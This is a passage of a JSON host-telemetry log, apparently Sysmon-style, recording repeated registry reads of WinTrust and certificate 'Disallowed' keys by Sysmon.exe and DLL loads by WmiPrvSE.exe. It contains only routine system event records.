"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - 
"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - 
"timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wmitomi.dll", - "image_path": "C:\\Windows\\System32\\wmitomi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "miutils.dll", - "image_path": "C:\\Windows\\System32\\miutils.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "NetAdapterCim.dll", - "image_path": "C:\\Windows\\System32\\wbem\\NetAdapterCim.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792140000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "devobj.dll", - "image_path": "C:\\Windows\\System32\\devobj.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573792290000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - 
"timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573792610000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 